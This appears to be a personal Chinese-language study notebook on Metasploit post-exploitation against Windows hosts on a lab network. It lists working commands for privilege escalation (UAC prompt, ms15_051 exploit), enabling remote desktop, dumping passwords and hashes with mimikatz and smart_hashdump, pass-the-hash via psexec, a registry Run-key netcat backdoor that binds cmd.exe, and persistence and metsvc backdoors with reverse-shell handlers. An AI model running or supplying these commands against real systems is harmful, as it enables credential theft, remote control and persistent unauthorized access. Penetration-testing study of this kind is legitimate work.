這裏只是一個筆記,可能沒有那麼全面和有條理,都是自己遇到的一些問題
1、shell裏的中文亂碼
獲得一個meterpreter shell之後,使用shell命令,顯示中文時會出現亂碼
解決方法:在輸入shell之後,再輸入chcp 65001
2、提權相關的問題
getuid發現不是管理員權限,使用getsystem命令提權(不使用參數默認使用全部提權方法)會報錯,不成功、
(提權方式:1、getsystem 2、系統內核漏洞提權 3、繞過UAC提權)
1)解決方法一:
我常使用exploit/windows/local/ask模塊,該模塊實際上只是以高權限重啓一個返回式shellcode,並沒有繞過UAC,會觸發系統UAC,受害機器有提示,提示用戶是否要運行,如果用戶選擇“yes”,就可以程序返回一個高權限meterpreter shell(需要執行getsystem)
2)解決方法二:
繞過UAC提權,msf內置多個pypassuac腳本,運行後返回一個新的會話,需要再次執行getsystem獲取系統權限
3)解決方法三:
在蒐集資料時發現了一個更牛逼的模塊,Local Exploit Suggester。這個模塊可以幫助我們識別系統存在哪些漏洞可以被利用,並且爲我們提供最合適的exp,通過這個exp我們可以進一步提權
首先要獲取目標主機的meterpreter會話,才能使用這個模塊。而且在使用這個模塊之前,我們需要先把當前的meterpreter會話放到後臺運行(CTRL+Z)
現在我們獲取到的meterpreter會話是3,執行下列命令:
use post/multi/recon/local_exploit_suggester
set LHOST 192.168.43.133
set SESSION 3
exploit
這裏我試了幾個,有些可能不行(可能有誤報或差別),選了一個exploit/windows/local/ms15_051_client_copy_image(打了幾次才成功):
use exploit/windows/local/ms15_051_client_copy_image
set lhost 192.168.43.133
set session 3
exploit
3、開啓遠程桌面
run getgui -e
run getgui -u zwish -p zwish
run getgui -f 6661 –e #3389端口轉發到6661
新開一個終端
rdesktop 127.0.0.1:6661
有時候也可以不用端口轉發rdesktop ip:3389
如果使用run getgui -u 用戶名 -p 密碼 不能添加成功,可以試一下post/windows/manage/enable_rdp模塊
但可能還是會報1332這個錯,具體原因google了一下還是沒有找到解決方案,解決了的dalao麻煩教教dd
4、抓取密碼(hash)
mimikatz
load mimikatz #help mimikatz 查看幫助
wdigest #獲取Wdigest密碼
mimikatz_command -f samdump::hashes #執行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords
5、註冊表操作
1)註冊表基本命令
reg –h
-d 註冊表中值的數據. -k 註冊表鍵路徑 -v 註冊表鍵名稱
enumkey 枚舉可獲得的鍵 setval 設置鍵值 queryval 查詢鍵值數據
2)註冊表設置nc後門
upload /usr/share/windows-binaries/nc.exe C:\windows\system32 #上傳nc
reg enumkey -k HKLM\software\microsoft\windows\currentversion\run #枚舉run下的key
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #設置鍵值
reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v lltest_nc #查看鍵值
nc -v 192.168.159.144 443 #攻擊者連接nc後門
6、哈希利用
1)獲取哈希
run post/windows/gather/smart_hashdump #從SAM導出密碼哈希
需要SYSTEM權限
2)PSExec哈希傳遞
通過smart_hashdump獲取用戶哈希後,可以利用psexec模塊進行哈希傳遞攻擊
前提條件:①開啓445端口 smb服務;②開啓admin$共享
msf > use exploit/windows/smb/psexec
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.134
msf > set LPORT 443
msf > set RHOST 192.168.159.144
msf >set SMBUser Administrator
msf >set SMBPass aad3b4*04ee:5b5f00*c424c
msf >set SMBDomain WORKGROUP #域用戶需要設置SMBDomain
msf >exploit
7、持久化(後門植入)
metasploit自帶的後門有兩種方式啓動的,一種是通過啓動項啓動(persistence),一種是通過服務啓動(metsvc),另外還可以通過persistence_exe自定義後門文件。
1)persistence啓動項後門
在C:\Users***\AppData\Local\Temp\目錄下,上傳一個vbs腳本
在註冊表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入開機啓動項
run persistence –h #查看幫助
run persistence -X -i 5 -p 6661 -r 192.168.159.134
-X指定啓動的方式爲開機自啓動,-i反向連接的時間間隔(5s) –r 指定攻擊者的ip
連接後門
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.134
msf > set LPORT 6661
msf > exploit
2)metsvc服務後門
在C:\Users***\AppData\Local\Temp\上傳了三個文件(metsrv.x86.dll、metsvc-server.exe、metsvc.exe),通過服務啓動,服務名爲meterpreter
run metsvc –h # 查看幫助
run metsvc –A #自動安裝後門
連接後門
msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 192.168.159.144
msf > set LPORT 31337
msf > exploit
8、更多資料
後滲透之meterpreter使用攻略 :https://xz.aliyun.com/t/2536#toc-12
metasploit下Windows的多種提權方法:https://www.anquanke.com/post/id/85064
Windows內核提權 :https://xz.aliyun.com/t/2862?spm=5176.12901015.0.i12901015.4d6a525cRdiEq4&accounttraceid=471428ecdd3a42548b6f7408324904eagyth